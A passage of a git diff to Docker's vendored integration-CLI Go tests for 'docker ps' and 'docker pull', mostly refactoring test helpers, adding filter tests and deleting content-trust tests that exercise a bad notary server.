= strings.Split(strings.TrimSpace(string(linesOut)), "\n") + lines = strings.Split(strings.TrimSpace(string(result.Combined())), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) // skip header lines = lines[1:] c.Assert(len(lines), checker.Equals, 1) @@ -736,6 +612,8 @@ func (s *DockerSuite) TestPsNotShowPortsOfStoppedContainer(c *check.C) { } func (s *DockerSuite) TestPsShowMounts(c *check.C) { + existingContainers := ExistingContainerNames(c) + prefix, slash := getPrefixAndSlashFromDaemonPlatform() mp := prefix + slash + "test" @@ -749,7 +627,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { // bind mount container var bindMountSource string var bindMountDestination string - if DaemonIsWindows.Condition() { + if DaemonIsWindows() { bindMountSource = "c:\\" bindMountDestination = "c:\\t" } else { @@ -762,6 +640,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}") lines := strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) c.Assert(lines, checker.HasLen, 3) fields := strings.Fields(lines[0]) @@ -772,7 +651,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { fields = strings.Fields(lines[1]) c.Assert(fields, checker.HasLen, 2) - annonymounsVolumeID := fields[1] + anonymousVolumeID := fields[1] fields = strings.Fields(lines[2]) c.Assert(fields[1], checker.Equals, "ps-volume-test") @@ -781,6 +660,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume=ps-volume-test") lines = strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) c.Assert(lines, checker.HasLen, 1) fields = strings.Fields(lines[0]) @@ -794,10 +674,11 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+mp) lines = strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) c.Assert(lines, checker.HasLen, 2) fields = strings.Fields(lines[0]) - c.Assert(fields[1], checker.Equals, annonymounsVolumeID) + c.Assert(fields[1], checker.Equals, anonymousVolumeID) fields = strings.Fields(lines[1]) c.Assert(fields[1], checker.Equals, "ps-volume-test") @@ -805,6 +686,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountSource) lines = strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) c.Assert(lines, checker.HasLen, 1) fields = strings.Fields(lines[0]) @@ -816,6 +698,7 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountDestination) lines = strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) c.Assert(lines, checker.HasLen, 1) fields = strings.Fields(lines[0]) @@ -828,24 +711,9 @@ func (s *DockerSuite) TestPsShowMounts(c *check.C) { c.Assert(strings.TrimSpace(string(out)), checker.HasLen, 0) } -func (s *DockerSuite) TestPsFormatSize(c *check.C) { - testRequires(c, DaemonIsLinux) - runSleepingContainer(c) - - out, _ := dockerCmd(c, "ps", "--format", "table {{.Size}}") - lines := strings.Split(out, "\n") - c.Assert(lines[1], checker.Not(checker.Equals), "0 B", check.Commentf("Should not display a size of 0 B")) - - out, _ = dockerCmd(c, "ps", "--size", "--format", "table {{.Size}}") - lines = strings.Split(out, "\n") - c.Assert(lines[0], checker.Equals, "SIZE", check.Commentf("Should only have one size column")) - - out, _ = dockerCmd(c, "ps", "--size", "--format", "raw") - lines = strings.Split(out, "\n") - c.Assert(lines[8], checker.HasPrefix, "size:", check.Commentf("Size should be appended on a newline")) -} - func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) { + existing := ExistingContainerIDs(c) + // TODO default network on Windows is not called "bridge", and creating a // custom network fails on Windows fails with "Error response from daemon: plugin not found") testRequires(c, DaemonIsLinux) @@ -863,7 +731,7 @@ func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) { lines = lines[1:] // ps output should have no containers - c.Assert(lines, checker.HasLen, 0) + c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 0) // Filter docker ps on network bridge out, _ = dockerCmd(c, "ps", "--filter", "network=bridge") @@ -875,7 +743,7 @@ func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) { lines = lines[1:] // ps output should have only one container - c.Assert(lines, checker.HasLen, 1) + c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 1) // Making sure onbridgenetwork is on the output c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on network\n")) @@ -890,7 +758,7 @@ func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) { lines = lines[1:] //ps output should have both the containers - c.Assert(lines, checker.HasLen, 2) + c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 2) // Making sure onbridgenetwork and onnonenetwork is on the output c.Assert(containerOut, checker.Contains, "onnonenetwork", check.Commentf("Missing the container on none network\n")) @@ -903,50 +771,104 @@ func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) { containerOut = strings.TrimSpace(string(out)) c.Assert(containerOut, checker.Contains, "onbridgenetwork") + + // Filter by partial network ID + partialnwID := string(nwID[0:4]) + + out, _ = dockerCmd(c, "ps", "--filter", "network="+partialnwID) + containerOut = strings.TrimSpace(string(out)) + + lines = strings.Split(containerOut, "\n") + + // skip header + lines = lines[1:] + + // ps output should have only one container + c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 1) + + // Making sure onbridgenetwork is on the output + c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on network\n")) + } func (s *DockerSuite) TestPsByOrder(c *check.C) { name1 := "xyz-abc" - out, err := runSleepingContainer(c, "--name", name1) - c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + out := runSleepingContainer(c, "--name", name1) container1 := strings.TrimSpace(out) name2 := "xyz-123" - out, err = runSleepingContainer(c, "--name", name2) - c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + out = runSleepingContainer(c, "--name", name2) container2 := strings.TrimSpace(out) name3 := "789-abc" - out, err = runSleepingContainer(c, "--name", name3) - c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + out = runSleepingContainer(c, "--name", name3) name4 := "789-123" - out, err = runSleepingContainer(c, "--name", name4) - c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + out = runSleepingContainer(c, "--name", name4) // Run multiple time should have the same result - out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz") - c.Assert(err, checker.NotNil) + out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz").Combined() c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1)) // Run multiple time should have the same result - out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz") - c.Assert(err, checker.NotNil) + out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz").Combined() c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1)) } -func (s *DockerSuite) TestPsFilterMissingArgErrorCode(c *check.C) { - _, errCode, _ := dockerCmdWithError("ps", "--filter") - c.Assert(errCode, checker.Equals, 125) +func (s *DockerSuite) TestPsListContainersFilterPorts(c *check.C) { + testRequires(c, DaemonIsLinux) + existingContainers := ExistingContainerIDs(c) + + out, _ := dockerCmd(c, "run", "-d", "--publish=80", "busybox", "top") + id1 := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "-d", "--expose=8080", "busybox", "top") + id2 := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q") + c.Assert(strings.TrimSpace(out), checker.Contains, id1) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "publish=80-8080/udp") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "expose=8081") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "publish=80-81") + c.Assert(strings.TrimSpace(out), checker.Equals, id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "expose=80/tcp") + c.Assert(strings.TrimSpace(out), checker.Equals, id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "expose=8080/tcp") + out = RemoveOutputForExistingElements(out, existingContainers) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id1) + c.Assert(strings.TrimSpace(out), checker.Equals, id2) } -// Test case for 30291 -func (s *DockerSuite) TestPsFormatTemplateWithArg(c *check.C) { - runSleepingContainer(c, "-d", "--name", "top", "--label", "some.label=label.foo-bar") - out, _ := dockerCmd(c, "ps", "--format", `{{.Names}} {{.Label "some.label"}}`) - c.Assert(strings.TrimSpace(out), checker.Equals, "top label.foo-bar") +func (s *DockerSuite) TestPsNotShowLinknamesOfDeletedContainer(c *check.C) { + testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.31")) + existingContainers := ExistingContainerNames(c) + + dockerCmd(c, "create", "--name=aaa", "busybox", "top") + dockerCmd(c, "create", "--name=bbb", "--link=aaa", "busybox", "top") + + out, _ := dockerCmd(c, "ps", "--no-trunc", "-a", "--format", "{{.Names}}") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + lines = RemoveLinesForExistingElements(lines, existingContainers) + expected := []string{"bbb", "aaa,bbb/aaa"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with non-truncated names: %v, got: %v", expected, names)) + + dockerCmd(c, "rm", "bbb") + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-a", "--format", "{{.Names}}") + out = RemoveOutputForExistingElements(out, existingContainers) + c.Assert(strings.TrimSpace(out), checker.Equals, "aaa") } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go index cb14c2c702..33d4ae5e7c 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go @@ -5,18 +5,19 @@ import ( "fmt" "io/ioutil" "os" - "os/exec" "path/filepath" "runtime" "strings" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest" "github.com/docker/distribution/manifest/manifestlist" "github.com/docker/distribution/manifest/schema2" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "github.com/opencontainers/go-digest" + "gotest.tools/icmd" ) // testPullImageWithAliases pulls a specific image tag and verifies that any aliases (i.e., other @@ -26,7 +27,7 @@ import ( func testPullImageWithAliases(c *check.C) { repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) - repos := []string{} + var repos []string for _, tag := range []string{"recent", "fresh"} { repos = append(repos, fmt.Sprintf("%v:%v", repoName, tag)) } @@ -62,17 +63,16 @@ func (s *DockerSchema1RegistrySuite) TestPullImageWithAliases(c *check.C) { func testConcurrentPullWholeRepo(c *check.C) { repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) - repos := []string{} + var repos []string for _, tag := range []string{"recent", "fresh", "todays"} { repo := fmt.Sprintf("%v:%v", repoName, tag) - _, err := buildImage(repo, fmt.Sprintf(` + buildImageSuccessfully(c, repo, build.WithDockerfile(fmt.Sprintf(` FROM busybox ENTRYPOINT ["/bin/echo"] ENV FOO foo ENV BAR bar CMD echo %s - `, repo), true) - c.Assert(err, checker.IsNil) + `, repo))) dockerCmd(c, "push", repo) repos = append(repos, repo) } @@ -87,8 +87,8 @@ func testConcurrentPullWholeRepo(c *check.C) { for i := 0; i != numPulls; i++ { go func() { - _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", "-a", repoName)) - results <- err + result := icmd.RunCommand(dockerBinary, "pull", "-a", repoName) + results <- result.Error }() } @@ -125,8 +125,8 @@ func testConcurrentFailingPull(c *check.C) { for i := 0; i != numPulls; i++ { go func() { - _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repoName+":asdfasdf")) - results <- err + result := icmd.RunCommand(dockerBinary, "pull", repoName+":asdfasdf") + results <- result.Error }() } @@ -151,17 +151,16 @@ func (s *DockerSchema1RegistrySuite) testConcurrentFailingPull(c *check.C) { func testConcurrentPullMultipleTags(c *check.C) { repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) - repos := []string{} + var repos []string for _, tag := range []string{"recent", "fresh", "todays"} { repo := fmt.Sprintf("%v:%v", repoName, tag) - _, err := buildImage(repo, fmt.Sprintf(` + buildImageSuccessfully(c, repo, build.WithDockerfile(fmt.Sprintf(` FROM busybox ENTRYPOINT ["/bin/echo"] ENV FOO foo ENV BAR bar CMD echo %s - `, repo), true) - c.Assert(err, checker.IsNil) + `, repo))) dockerCmd(c, "push", repo) repos = append(repos, repo) } @@ -175,8 +174,8 @@ func testConcurrentPullMultipleTags(c *check.C) { for _, repo := range repos { go func(repo string) { - _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repo)) - results <- err + result := icmd.RunCommand(dockerBinary, "pull", repo) + results <- result.Error }(repo) } @@ -209,21 +208,15 @@ func testPullIDStability(c *check.C) { derivedImage := privateRegistryURL + "/dockercli/id-stability" baseImage := "busybox" - _, err := buildImage(derivedImage, fmt.Sprintf(` + buildImageSuccessfully(c, derivedImage, build.WithDockerfile(fmt.Sprintf(` FROM %s ENV derived true ENV asdf true RUN dd if=/dev/zero of=/file bs=1024 count=1024 CMD echo %s - `, baseImage, derivedImage), true) - if err != nil { - c.Fatal(err) - } + `, baseImage, derivedImage))) - originalID, err := getIDByName(derivedImage) - if err != nil { - c.Fatalf("error inspecting: %v", err) - } + originalID := getIDByName(c, derivedImage) dockerCmd(c, "push", derivedImage) // Pull @@ -232,10 +225,7 @@ func testPullIDStability(c *check.C) { c.Fatalf("repull redownloaded a layer: %s", out) } - derivedIDAfterPull, err := getIDByName(derivedImage) - if err != nil { - c.Fatalf("error inspecting: %v", err) - } + derivedIDAfterPull := getIDByName(c, derivedImage) if derivedIDAfterPull != originalID { c.Fatal("image's ID unexpectedly changed after a repush/repull") @@ -252,17 +242,11 @@ func testPullIDStability(c *check.C) { dockerCmd(c, "rmi", derivedImage) dockerCmd(c, "pull", derivedImage) - derivedIDAfterPull, err = getIDByName(derivedImage) - if err != nil { - c.Fatalf("error inspecting: %v", err) - } + derivedIDAfterPull = getIDByName(c, derivedImage) if derivedIDAfterPull != originalID { c.Fatal("image's ID unexpectedly changed after a repush/repull") } - if err != nil { - c.Fatalf("error inspecting: %v", err) - } // Make sure the image still runs out, _ = dockerCmd(c, "run", "--rm", derivedImage) @@ -283,14 +267,9 @@ func (s *DockerSchema1RegistrySuite) TestPullIDStability(c *check.C) { func testPullNoLayers(c *check.C) { repoName := fmt.Sprintf("%v/dockercli/scratch", privateRegistryURL) - _, err := buildImage(repoName, ` + buildImageSuccessfully(c, repoName, build.WithDockerfile(` FROM scratch - ENV foo bar`, - true) - if err != nil { - c.Fatal(err) - } - + ENV foo bar`)) dockerCmd(c, "push", repoName) dockerCmd(c, "rmi", repoName) dockerCmd(c, "pull", repoName) @@ -347,7 +326,7 @@ func (s *DockerRegistrySuite) TestPullManifestList(c *check.C) { manifestListDigest := digest.FromBytes(manifestListJSON) hexDigest := manifestListDigest.Hex() - registryV2Path := filepath.Join(s.reg.dir, "docker", "registry", "v2") + registryV2Path := s.reg.Path() // Write manifest list to blob store blobDir := filepath.Join(registryV2Path, "blobs", "sha256", hexDigest[:2], hexDigest) @@ -411,7 +390,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuthLoginWithSchem err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) c.Assert(err, checker.IsNil) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) b, err := ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) @@ -421,7 +400,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuthLoginWithSchem dockerCmd(c, "--config", tmp, "push", repoName) dockerCmd(c, "--config", tmp, "logout", privateRegistryURL) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, "https://"+privateRegistryURL) + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), "https://"+privateRegistryURL) dockerCmd(c, "--config", tmp, "pull", repoName) // likewise push should work @@ -456,7 +435,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuth(c *check.C) { err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) c.Assert(err, checker.IsNil) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) b, err := ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) @@ -481,12 +460,11 @@ func (s *DockerRegistrySuite) TestRunImplicitPullWithNoTag(c *check.C) { dockerCmd(c, "rmi", repoTag1) dockerCmd(c, "rmi", repoTag2) - out, _, err := dockerCmdWithError("run", repo) - c.Assert(err, check.IsNil) + out, _ := dockerCmd(c, "run", repo) c.Assert(out, checker.Contains, fmt.Sprintf("Unable to find image '%s:latest' locally", repo)) // There should be only one line for repo, the one with repo:latest - outImageCmd, _, err := dockerCmdWithError("images", repo) + outImageCmd, _ := dockerCmd(c, "images", repo) splitOutImageCmd := strings.Split(strings.TrimSpace(outImageCmd), "\n") c.Assert(splitOutImageCmd, checker.HasLen, 2) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go index a0118a8e95..0e88b1e56f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go @@ -7,9 +7,9 @@ import ( "sync" "time" - "github.com/docker/distribution/digest" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "github.com/opencontainers/go-digest" ) // TestPullFromCentralRegistry pulls an image from the central registry and verifies that the client @@ -26,7 +26,7 @@ func (s *DockerHubPullSuite) TestPullFromCentralRegistry(c *check.C) { matches := regexp.MustCompile(`Digest: (.+)\n`).FindAllStringSubmatch(out, -1) c.Assert(len(matches), checker.Equals, 1, check.Commentf("expected exactly one image digest in the output")) c.Assert(len(matches[0]), checker.Equals, 2, check.Commentf("unexpected number of submatches for the digest")) - _, err := digest.ParseDigest(matches[0][1]) + _, err := digest.Parse(matches[0][1]) c.Check(err, checker.IsNil, check.Commentf("invalid digest %q in output", matches[0][1])) // We should have a single entry in images. @@ -98,11 +98,11 @@ func (s *DockerHubPullSuite) TestPullNonExistingImage(c *check.C) { for record := range recordChan { if len(record.option) == 0 { c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out)) - c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found: does not exist or no pull access", record.e.repo), check.Commentf("expected image not found error messages")) + c.Assert(record.out, checker.Contains, fmt.Sprintf("pull access denied for %s, repository does not exist or may require 'docker login'", record.e.repo), check.Commentf("expected image not found error messages")) } else { // pull -a on a nonexistent registry should fall back as well c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out)) - c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found", record.e.repo), check.Commentf("expected image not found error messages")) + c.Assert(record.out, checker.Contains, fmt.Sprintf("pull access denied for %s, repository does not exist or may require 'docker login'", record.e.repo), check.Commentf("expected image not found error messages")) c.Assert(record.out, checker.Not(checker.Contains), "unauthorized", check.Commentf(`message should not contain "unauthorized"`)) } } @@ -110,7 +110,7 @@ func (s *DockerHubPullSuite) TestPullNonExistingImage(c *check.C) { } // TestPullFromCentralRegistryImplicitRefParts pulls an image from the central registry and verifies -// that pulling the same image with different combinations of implicit elements of the the image +// that pulling the same image with different combinations of implicit elements of the image // reference (tag, repository, central registry url, ...) doesn't trigger a new pull nor leads to // multiple images. func (s *DockerHubPullSuite) TestPullFromCentralRegistryImplicitRefParts(c *check.C) { @@ -193,25 +193,26 @@ func (s *DockerHubPullSuite) TestPullScratchNotAllowed(c *check.C) { // results in more images than a naked pull. func (s *DockerHubPullSuite) TestPullAllTagsFromCentralRegistry(c *check.C) { testRequires(c, DaemonIsLinux) - s.Cmd(c, "pull", "busybox") - outImageCmd := s.Cmd(c, "images", "busybox") + s.Cmd(c, "pull", "dockercore/engine-pull-all-test-fixture") + outImageCmd := s.Cmd(c, "images", "dockercore/engine-pull-all-test-fixture") splitOutImageCmd := strings.Split(strings.TrimSpace(outImageCmd), "\n") c.Assert(splitOutImageCmd, checker.HasLen, 2) - s.Cmd(c, "pull", "--all-tags=true", "busybox") - outImageAllTagCmd := s.Cmd(c, "images", "busybox") + s.Cmd(c, "pull", "--all-tags=true", "dockercore/engine-pull-all-test-fixture") + outImageAllTagCmd := s.Cmd(c, "images", "dockercore/engine-pull-all-test-fixture") linesCount := strings.Count(outImageAllTagCmd, "\n") c.Assert(linesCount, checker.GreaterThan, 2, check.Commentf("pulling all tags should provide more than two images, got %s", outImageAllTagCmd)) - // Verify that the line for 'busybox:latest' is left unchanged. + // Verify that the line for 'dockercore/engine-pull-all-test-fixture:latest' is left unchanged. var latestLine string for _, line := range strings.Split(outImageAllTagCmd, "\n") { - if strings.HasPrefix(line, "busybox") && strings.Contains(line, "latest") { + if strings.HasPrefix(line, "dockercore/engine-pull-all-test-fixture") && strings.Contains(line, "latest") { latestLine = line break } } - c.Assert(latestLine, checker.Not(checker.Equals), "", check.Commentf("no entry for busybox:latest found after pulling all tags")) + c.Assert(latestLine, checker.Not(checker.Equals), "", check.Commentf("no entry for dockercore/engine-pull-all-test-fixture:latest found after pulling all tags")) + splitLatest := strings.Fields(latestLine) splitCurrent := strings.Fields(splitOutImageCmd[1]) @@ -227,7 +228,7 @@ func (s *DockerHubPullSuite) TestPullAllTagsFromCentralRegistry(c *check.C) { splitCurrent[4] = "" splitCurrent[5] = "" - c.Assert(splitLatest, checker.DeepEquals, splitCurrent, check.Commentf("busybox:latest was changed after pulling all tags")) + c.Assert(splitLatest, checker.DeepEquals, splitCurrent, check.Commentf("dockercore/engine-pull-all-test-fixture:latest was changed after pulling all tags")) } // TestPullClientDisconnect kills the client during a pull operation and verifies that the operation @@ -243,6 +244,7 @@ func (s *DockerHubPullSuite) TestPullClientDisconnect(c *check.C) { c.Assert(err, checker.IsNil) err = pullCmd.Start() c.Assert(err, checker.IsNil) + go pullCmd.Wait() // Cancel as soon as we get some output. buf := make([]byte, 10) @@ -257,18 +259,16 @@ func (s *DockerHubPullSuite) TestPullClientDisconnect(c *check.C) { c.Assert(err, checker.NotNil, check.Commentf("image was pulled after client disconnected")) } -func (s *DockerRegistryAuthHtpasswdSuite) TestPullNoCredentialsNotFound(c *check.C) { - // we don't care about the actual image, we just want to see image not found - // because that means v2 call returned 401 and we fell back to v1 which usually - // gives a 404 (in this case the test registry doesn't handle v1 at all) - out, _, err := dockerCmdWithError("pull", privateRegistryURL+"/busybox") - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Error: image busybox:latest not found") -} - // Regression test for https://github.com/docker/docker/issues/26429 func (s *DockerSuite) TestPullLinuxImageFailsOnWindows(c *check.C) { testRequires(c, DaemonIsWindows, Network) _, _, err := dockerCmdWithError("pull", "ubuntu") + c.Assert(err.Error(), checker.Contains, "no matching manifest") +} + +// Regression test for https://github.com/docker/docker/issues/28892 +func (s *DockerSuite) TestPullWindowsImageFailsOnLinux(c *check.C) { + testRequires(c, DaemonIsLinux, Network) + _, _, err := dockerCmdWithError("pull", "microsoft/nanoserver") c.Assert(err.Error(), checker.Contains, "cannot be used on this platform") } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go deleted file mode 100644 index 96a42d6758..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go +++ /dev/null @@ -1,365 +0,0 @@ -package main - -import ( - "fmt" - "io/ioutil" - "os/exec" - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerTrustSuite) TestTrustedPull(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-pull") - - // Try pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) - - dockerCmd(c, "rmi", repoName) - // Try untrusted pull to ensure we pushed the tag to the registry - pullCmd = exec.Command(dockerBinary, "pull", "--disable-content-trust=true", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) - -} - -func (s *DockerTrustSuite) TestTrustedIsolatedPull(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-isolated-pull") - - // Try pull (run from isolated directory without trust information) - pullCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(string(out))) - - dockerCmd(c, "rmi", repoName) -} - -func (s *DockerTrustSuite) TestUntrustedPull(c *check.C) { - repoName := fmt.Sprintf("%v/dockercliuntrusted/pulltest:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - dockerCmd(c, "push", repoName) - dockerCmd(c, "rmi", repoName) - - // Try trusted pull on untrusted tag - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestPullWhenCertExpired(c *check.C) { - c.Skip("Currently changes system time, causing instability") - repoName := s.setupTrustedImage(c, "trusted-cert-expired") - - // Certificates have 10 years of expiration - elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf(out)) - }) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try pull - pullCmd := exec.Command(dockerBinary, "pull", "--disable-content-trust", repoName) - s.trustedCmd(pullCmd) - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) - }) -} - -func (s *DockerTrustSuite) TestTrustedPullFromBadTrustServer(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclievilpull/trusted:latest", privateRegistryURL) - evilLocalConfigDir, err := ioutil.TempDir("", "evil-local-config-dir") - if err != nil { - c.Fatalf("Failed to create local temp dir") - } - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) - dockerCmd(c, "rmi", repoName) - - // Try pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) - dockerCmd(c, "rmi", repoName) - - // Kill the notary server, start a new "evil" one. - s.not.Close() - s.not, err = newTestNotary(c) - - c.Assert(err, check.IsNil, check.Commentf("Restarting notary server failed.")) - - // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. - // 